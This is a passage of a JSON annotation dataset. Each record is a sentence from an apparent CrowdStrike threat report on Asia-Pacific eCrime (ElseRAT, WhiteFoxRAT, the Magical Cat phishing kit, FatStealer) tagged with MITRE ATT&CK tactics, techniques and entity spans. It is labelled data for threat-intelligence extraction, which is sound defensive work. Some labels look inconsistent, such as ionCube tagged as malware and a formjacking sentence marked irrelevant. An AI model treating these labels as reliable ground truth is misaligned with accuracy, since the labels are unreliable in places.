svchost.db Is ElseRAT Installed?\nSTARTS AS SERVICE DECRYPTS AND EXECUTES", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "The binary drops and executes an ElseRAT sample and establishes persistence by running as a service.", "entities": [ { "text": "ElseRAT", "start": 78, "end": 85, "label": "MalwareTool" }, { "text": "drops an ElseRAT sample", "start": 69, "end": 92, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p10-s57-a131d9", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 10, "sentence_id": 57, "context_before": "The ZIP archive contains a binary named document.exe that ultimately drops an ElseRAT sample (Figure 6).\nEXTRACTS AND EXTRACTS AND LOADS AND LOADS AND DROPS ZIP EXECUTES EXECUTES EXECUTES EXECUTES Lure Document ZIP File ElseRAT Dropper ElseRAT EPL Loader EPL Kernel Library Compiled EPL Loader document.exe svchost.exe kmln.fnr svchost.db Is ElseRAT Installed?\nSTARTS AS SERVICE DECRYPTS AND EXECUTES", "sentence_text": "NO YES ElseRAT Installer ElseRAT Main maindll.db elsedll.db", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s58-76c122", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 58, "context_before": "NO YES ElseRAT Installer ElseRAT Main maindll.db elsedll.db", "sentence_text": "The EPL loader loads the ElseRAT installer, which disables security controls and executes the ElseRAT binary.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "The loader executes the ElseRAT installer, disables security controls, and runs the ElseRAT binary.", "entities": [ { "text": "ElseRAT", "start": 25, "end": 32, "label": "MalwareTool" }, { "text": "loads the ElseRAT installer, which disables security controls and executes the ElseRAT binary", "start": 15, "end": 108, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s59-46d89d", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 59, "context_before": "The EPL loader loads the ElseRAT installer, which disables security controls and executes the ElseRAT binary.", "sentence_text": "This campaign’s ElseRAT samples connect to three command-and-control (C2) domains that all resolve to an IP address owned by XNNET LLC, a U.S.-based hosting provider with no apparent social media presence and a one-page website providing no service or purchase details.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "ElseRAT samples establish connections to command-and-control domains hosted on infrastructure associated with XNNET LLC.", "entities": [ { "text": "ElseRAT", "start": 16, "end": 23, "label": "MalwareTool" }, { "text": "connect to three command-and-control (C2) domains", "start": 32, "end": 81, "label": "Action" }, { "text": "three command-and-control (C2) domains", "start": 43, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s60-ff5a02", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 60, "context_before": "This campaign’s ElseRAT samples connect to three command-and-control (C2) domains that all resolve to an IP address owned by XNNET LLC, a U.S.-based hosting provider with no apparent social media presence and a one-page website providing no service or purchase details.", "sentence_text": "The company is registered in Wyoming by a firm that acts as a proxy registrar for businesses wishing to obscure their true ownership.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s61-fa575e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 61, "context_before": "The company is registered in Wyoming by a firm that acts as a proxy registrar for businesses wishing to obscure their true ownership.", "sentence_text": "A native Chinese speaker using the moniker Brother Li developed WhiteFoxRAT and offers it for sale on a Chinese-language Telegram channel.(李哥)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s62-589554", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 62, "context_before": "A native Chinese speaker using the moniker Brother Li developed WhiteFoxRAT and offers it for sale on a Chinese-language Telegram channel.(李哥)", "sentence_text": "Brother Li also maintains WhiteFoxRAT’s distribution domains, which masquerade as legitimate software download sources.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Maintain distribution domains that masquerade as legitimate software download sources.", "entities": [ { "text": "Brother Li", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "WhiteFoxRAT", "start": 26, "end": 37, "label": "MalwareTool" }, { "text": "maintains WhiteFoxRAT’s distribution domains, which masquerade as legitimate software download sources", "start": 16, "end": 118, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s63-c02306", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 63, "context_before": "Brother Li also maintains WhiteFoxRAT’s distribution domains, which masquerade as legitimate software download sources.", "sentence_text": "The developer claims to direct traffic to the domains via search engine bidding, in which threat actors place bids on specific search engine keywords that then appear as sponsored results when users search those keywords.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Direct user traffic to malicious domains via search engine keyword bidding to expose users to malicious content.", "entities": [ { "text": "direct traffic to the domains via search engine bidding", "start": 24, "end": 79, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s64-1e495e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 64, "context_before": "The developer claims to direct traffic to the domains via search engine bidding, in which threat actors place bids on specific search engine keywords that then appear as sponsored results when users search those keywords.", "sentence_text": "WhiteFoxRAT distribution targets Chinese-speaking users across multiple geographies; Brother Li’s distribution domains often leverage VPN-themed phishing lures, suggesting the threat actor also targets Chinese users operating outside China’s restrictive internet parameters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s65-72cf34", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 65, "context_before": "WhiteFoxRAT distribution targets Chinese-speaking users across multiple geographies; Brother Li’s distribution domains often leverage VPN-themed phishing lures, suggesting the threat actor also targets Chinese users operating outside China’s restrictive internet parameters.", "sentence_text": "The adversary relies on financial transaction-themed phishing lures to deliver their JsOutProx RAT and commodity malware that includes NetSupportRAT, STRRAT, and WSHRAT.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Deliver JsOutProx RAT and other commodity malware via financial transaction-themed phishing lures.", "entities": [ { "text": "adversary", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "relies on financial transaction-themed phishing lures to deliver their JsOutProx RAT and commodity malware", "start": 14, "end": 120, "label": "Action" }, { "text": "JsOutProx RAT", "start": 85, "end": 98, "label": "MalwareTool" }, { "text": "NetSupportRAT", "start": 135, "end": 148, "label": "MalwareTool" }, { "text": "STRRAT", "start": 150, "end": 156, "label": "MalwareTool" }, { "text": "WSHRAT", "start": 162, "end": 168, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s66-2c3d65", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 66, "context_before": "The adversary relies on financial transaction-themed phishing lures to deliver their JsOutProx RAT and commodity malware that includes NetSupportRAT, STRRAT, and WSHRAT.", "sentence_text": "The adversary leveraged Swift and Western Union transaction-themed phishing lures to deliver payloads hosted on GitHub and GitLab.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Deliver payloads via Swift and Western Union transaction-themed phishing lures hosted on GitHub and GitLab.", "entities": [ { "text": "adversary", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "leveraged Swift and Western Union transaction-themed phishing lures to deliver payloads hosted on GitHub and GitLab", "start": 14, "end": 129, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p11-s67-f787a7", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 11, "sentence_id": 67, "context_before": "The adversary leveraged Swift and Western Union transaction-themed phishing lures to deliver payloads hosted on GitHub and GitLab.", "sentence_text": "As well as their typical payloads, SOLAR SPIDER delivered a likely new Meduza Stealer version and custom Java reconnaissance tools.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deliver a new Meduza Stealer version and custom Java reconnaissance tools.", "entities": [ { "text": "SOLAR SPIDER", "start": 35, "end": 47, "label": "ThreatActor" }, { "text": "delivered a likely new Meduza Stealer version and custom Java reconnaissance tools", "start": 48, "end": 130, "label": "Action" }, { "text": "Meduza Stealer", "start": 71, "end": 85, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s68-d5197f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 68, "context_before": "As well as their typical payloads, SOLAR SPIDER delivered a likely new Meduza Stealer version and custom Java reconnaissance tools.", "sentence_text": "Observed\neCrime Service Providers CDNCLOUD BULLETPROOF HOSTING Since July 2024, China-based bulletproof hosting provider CDNCLOUD has advertised its services on the Telegram channel “CDNCLOUD server — fangfang”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s69-fac7c7", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 69, "context_before": "Observed\neCrime Service Providers CDNCLOUD BULLETPROOF HOSTING Since July 2024, China-based bulletproof hosting provider CDNCLOUD has advertised its services on the Telegram channel “CDNCLOUD server — fangfang”", "sentence_text": "CDNCLOUD offers two data routes for its servers: ChinaNet Next Carrying Network (CN2) — a Chinese telecom network — and Border Gateway Protocol (BGP), which includes multiple interconnected routing protocols.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s70-a669bd", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 70, "context_before": "CDNCLOUD offers two data routes for its servers: ChinaNet Next Carrying Network (CN2) — a Chinese telecom network — and Border Gateway Protocol (BGP), which includes multiple interconnected routing protocols.", "sentence_text": "Tether addresses that receive CDNCLOUD funds are likely associated with Huione Group escrow services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s71-caad38", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 71, "context_before": "Tether addresses that receive CDNCLOUD funds are likely associated with Huione Group escrow services.", "sentence_text": "MAGICAL CAT PHISHING KIT Since December 2023, threat actor Luck has operated three Chinese-language Telegram channels promoting their phishing as a service tool Magical Cat.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Operate Telegram channels to promote a phishing-as-a-service tool.", "entities": [ { "text": "Luck", "start": 59, "end": 63, "label": "ThreatActor" }, { "text": "operated three Chinese-language Telegram channels promoting their phishing as a service tool Magical Cat", "start": 68, "end": 172, "label": "Action" }, { "text": "Magical Cat", "start": 161, "end": 172, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s72-c40656", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 72, "context_before": "MAGICAL CAT PHISHING KIT Since December 2023, threat actor Luck has operated three Chinese-language Telegram channels promoting their phishing as a service tool Magical Cat.", "sentence_text": "Magical Cat includes the Dracula Suite, a framework that clones legitimate websites for use as phishing pages.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Clone legitimate websites to create phishing pages.", "entities": [ { "text": "Magical Cat", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "Dracula Suite", "start": 25, "end": 38, "label": "MalwareTool" }, { "text": "clones legitimate websites for use as phishing pages", "start": 57, "end": 109, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s73-3a5b3c", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 73, "context_before": "Magical Cat includes the Dracula Suite, a framework that clones legitimate websites for use as phishing pages.", "sentence_text": "Luck also regularly shares prebuilt phishing templates in their Telegram channels, targeting organizations across multiple regions.\ntargeting organizations across APJ (Figure 7).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p12-s74-2a0668", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 12, "sentence_id": 74, "context_before": "Luck also regularly shares prebuilt phishing templates in their Telegram channels, targeting organizations across multiple regions.\ntargeting organizations across APJ (Figure 7).", "sentence_text": "Domain registration patterns, campaign timelines, and targeting cycles analysis suggest these campaigns were conducted by multiple distinct threat actors leveraging the same phishing kit rather than as part of a single coordinated operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p13-s75-908bc3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 13, "sentence_id": 75, "context_before": "Domain registration patterns, campaign timelines, and targeting cycles analysis suggest these campaigns were conducted by multiple distinct threat actors leveraging the same phishing kit rather than as part of a single coordinated operation.", "sentence_text": "SMS Graves International SMS a global SMS spam service first advertised by yongd02 on Telegram on (格雷福斯 国际短信), April 11, 2025, includes a dedicated Magical Cat v3 phishing kit integration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p13-s76-0796f7", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 13, "sentence_id": 76, "context_before": "SMS Graves International SMS a global SMS spam service first advertised by yongd02 on Telegram on (格雷福斯 国际短信), April 11, 2025, includes a dedicated Magical Cat v3 phishing kit integration.", "sentence_text": "Though the service operates independently, threat actor Luck specifically recommends it to Magical Cat users.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p13-s77-7b20e8", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 13, "sentence_id": 77, "context_before": "Though the service operates independently, threat actor Luck specifically recommends it to Magical Cat users.", "sentence_text": "The integration enables automated high-volume SMS distribution for Magical Cat’s phishing pages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p13-s78-b8629b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 13, "sentence_id": 78, "context_before": "The integration enables automated high-volume SMS distribution for Magical Cat’s phishing pages.", "sentence_text": "The ATO campaigns reportedly leveraged compromised accounts to purchase China-based companies’ thinly traded stocks (aka penny stocks) to artificially inflate prices and sell earlier positions.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Leverage compromised accounts to conduct stock manipulation by purchasing thinly traded stocks, inflating prices, and selling positions.", "entities": [ { "text": "ATO campaigns", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "leveraged compromised accounts to purchase China-based companies’ thinly traded stocks (aka penny stocks) to artificially inflate prices and sell earlier positions", "start": 29, "end": 192, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p13-s79-80fa14", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 13, "sentence_id": 79, "context_before": "The ATO campaigns reportedly leveraged compromised accounts to purchase China-based companies’ thinly traded stocks (aka penny stocks) to artificially inflate prices and sell earlier positions.", "sentence_text": "One or more Chinese-speaking eCrime actors likely used the same phishing kit to conduct the campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p13-s80-b4e828", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 13, "sentence_id": 80, "context_before": "One or more Chinese-speaking eCrime actors likely used the same phishing kit to conduct the campaigns.", "sentence_text": "This assessment is made with high confidence based on Chinese comments in the phishing kit’s code, reliance on China-based infrastructure, and sales of victim data on Chang’an.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s81-7cf28f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 81, "context_before": "This assessment is made with high confidence based on Chinese comments in the phishing kit’s code, reliance on China-based infrastructure, and sales of victim data on Chang’an.", "sentence_text": "Vietnam-Based Threats\nThe Vietnamese eCrime ecosystem focuses particularly on social media business account compromise; threat actors target accounts with significant advertising budgets.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1586", "name": "Compromise Accounts" } ], "procedure": "Target social media business accounts with significant advertising budgets for account compromise.", "entities": [ { "text": "threat actors", "start": 120, "end": 133, "label": "ThreatActor" }, { "text": "target accounts with significant advertising budgets", "start": 134, "end": 186, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s82-bc9890", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 82, "context_before": "Vietnam-Based Threats\nThe Vietnamese eCrime ecosystem focuses particularly on social media business account compromise; threat actors target accounts with significant advertising budgets.", "sentence_text": "In May 2024, Vietnamese authorities prosecuted more than 20 individuals for the development and distribution of information stealers, both domestically and internationally, that led to more than 20,000 compromised social media accounts.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "developed and distributed information stealer malware", "entities": [ { "text": "information stealers", "start": 112, "end": 132, "label": "MalwareTool" }, { "text": "development and distribution of information stealers", "start": 80, "end": 132, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s83-56db68", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 83, "context_before": "In May 2024, Vietnamese authorities prosecuted more than 20 individuals for the development and distribution of information stealers, both domestically and internationally, that led to more than 20,000 compromised social media accounts.", "sentence_text": "Vietnamese-speaking malware developers have designed multiple information stealers specifically for social media credential theft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s84-c3c8d5", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 84, "context_before": "Vietnamese-speaking malware developers have designed multiple information stealers specifically for social media credential theft.", "sentence_text": "These include the recent threats Ailurophile Stealer and FatStealer, which both contain Vietnamese-language code strings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s85-744f59", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 85, "context_before": "These include the recent threats Ailurophile Stealer and FatStealer, which both contain Vietnamese-language code strings.", "sentence_text": "AILUROPHILE STEALER\nSince August 2024, threat actor Ailurophile has advertised the information stealer Ailurophile Stealer on the underground forum exploit[.]in.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s86-54e381", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 86, "context_before": "AILUROPHILE STEALER\nSince August 2024, threat actor Ailurophile has advertised the information stealer Ailurophile Stealer on the underground forum exploit[.]in.", "sentence_text": "Ailurophile Stealer includes several error messages and text-file messages in Vietnamese, suggesting its developer speaks Vietnamese.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s87-614944", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 87, "context_before": "Ailurophile Stealer includes several error messages and text-file messages in Vietnamese, suggesting its developer speaks Vietnamese.", "sentence_text": "FATSTEALER\nSince March 2023, campaigns distributing the PHP-based information stealer FatStealer have used malvertising and SEO poisoning to distribute files masquerading as popular movies or legitimate software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Use malvertising and SEO poisoning to distribute files disguised as legitimate content such as movies or software.", "entities": [ { "text": "FatStealer", "start": 86, "end": 96, "label": "MalwareTool" }, { "text": "used malvertising and SEO poisoning to distribute files masquerading as popular movies or legitimate software", "start": 102, "end": 211, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p14-s88-25a638", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 14, "sentence_id": 88, "context_before": "FATSTEALER\nSince March 2023, campaigns distributing the PHP-based information stealer FatStealer have used malvertising and SEO poisoning to distribute files masquerading as popular movies or legitimate software.", "sentence_text": "Operators typically distribute FatStealer in ZIP archives and obfuscate the stealer with the legitimate commercial software ionCube.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1204.002", "name": "User Execution: Malicious File" } ], "procedure": "Distribute FatStealer in ZIP archives and obfuscate it with ionCube.", "entities": [ { "text": "Operators", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "FatStealer", "start": 31, "end": 41, "label": "MalwareTool" }, { "text": "distribute FatStealer in ZIP archives and obfuscate the stealer with the legitimate commercial software ionCube", "start": 20, "end": 131, "label": "Action" }, { "text": "ionCube", "start": 124, "end": 131, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p15-s89-f950e8", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 15, "sentence_id": 89, "context_before": "Operators typically distribute FatStealer in ZIP archives and obfuscate the stealer with the legitimate commercial software ionCube.", "sentence_text": "Although ransomware and data extortion campaigns impact APJ-based organizations on a smaller scale than in Europe and North America, BGH adversaries will likely continue to pose the greatest eCrime threat to large regional economies, such as Australia, India, Japan, Taiwan, and Singapore.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p15-s90-771ddb", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 15, "sentence_id": 90, "context_before": "Although ransomware and data extortion campaigns impact APJ-based organizations on a smaller scale than in Europe and North America, BGH adversaries will likely continue to pose the greatest eCrime threat to large regional economies, such as Australia, India, Japan, Taiwan, and Singapore.", "sentence_text": "Likely APJ-based eCrime actors exhibit a variety of different monetization methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p15-s91-5b57f3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 15, "sentence_id": 91, "context_before": "Likely APJ-based eCrime actors exhibit a variety of different monetization methods.", "sentence_text": "Both China-based RADIANT SPIDER and Vietnam-based CHARIOT SPIDER have conducted long-running formjacking campaigns in which they inject malicious JavaScript to targeted websites to harvest payment data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p15-s92-a3f4a3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 15, "sentence_id": 92, "context_before": "Both China-based RADIANT SPIDER and Vietnam-based CHARIOT SPIDER have conducted long-running formjacking campaigns in which they inject malicious JavaScript to targeted websites to harvest payment data.", "sentence_text": "An unidentified likely eCrime actor performed ATO campaigns throughout the first half of 2025 targeting consumer securities accounts to purchase penny stocks in China-based companies, likely with the intent to inflate those stocks’ value.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p15-s93-0f3cd3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 15, "sentence_id": 93, "context_before": "An unidentified likely eCrime actor performed ATO campaigns throughout the first half of 2025 targeting consumer securities accounts to purchase penny stocks in China-based companies, likely with the intent to inflate those stocks’ value.", "sentence_text": "These campaigns are largely opportunistic, with users often directed to malicious sites via malvertising and SEO.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s94-ee3d69", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 94, "context_before": "These campaigns are largely opportunistic, with users often directed to malicious sites via malvertising and SEO.", "sentence_text": "By offloading time-intensive, repetitive tasks, agentic AI empowers human analysts to focus on proactive threat hunting and hypothesis-driven investigation, elevating both strategic impact and operational efficiency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s95-7198e3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 95, "context_before": "By offloading time-intensive, repetitive tasks, agentic AI empowers human analysts to focus on proactive threat hunting and hypothesis-driven investigation, elevating both strategic impact and operational efficiency.", "sentence_text": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s96-e0e3b8", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 96, "context_before": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "sentence_text": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, and backdoor account creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s97-0a3396", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 97, "context_before": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, and backdoor account creation.", "sentence_text": "Integrating these tools with extended detection and response (XDR) platforms enables comprehensive visibility and a unified defense against adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s98-fe6300", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 98, "context_before": "Integrating these tools with extended detection and response (XDR) platforms enables comprehensive visibility and a unified defense against adversaries.", "sentence_text": "Additionally, organizations should educate users to recognize voice phishing (vishing) and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s99-255945", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 99, "context_before": "Additionally, organizations should educate users to recognize voice phishing (vishing) and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "sentence_text": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s100-40ff10", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 100, "context_before": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "sentence_text": "Unlike traditional malware, these methods allow attackers to bypass legacy security measures by executing commands and using legitimate software to mimic normal operations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1218", "name": "Signed Binary Proxy Execution" } ], "procedure": "Bypass security measures by executing commands and using legitimate software to mimic normal operations.", "entities": [ { "text": "bypass legacy security measures by executing commands and using legitimate software to mimic normal operations", "start": 61, "end": 171, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s101-874729", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 101, "context_before": "Unlike traditional malware, these methods allow attackers to bypass legacy security measures by executing commands and using legitimate software to mimic normal operations.", "sentence_text": "To counter this, organizations must modernize their detection and response strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s102-4e2b02", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 102, "context_before": "To counter this, organizations must modernize their detection and response strategies.", "sentence_text": "Agentic AI-powered triage and investigations can extend these capabilities, autonomously analyzing signals across domains to surface high-fidelity insights and prioritize real threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p16-s103-7a487f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 16, "sentence_id": 103, "context_before": 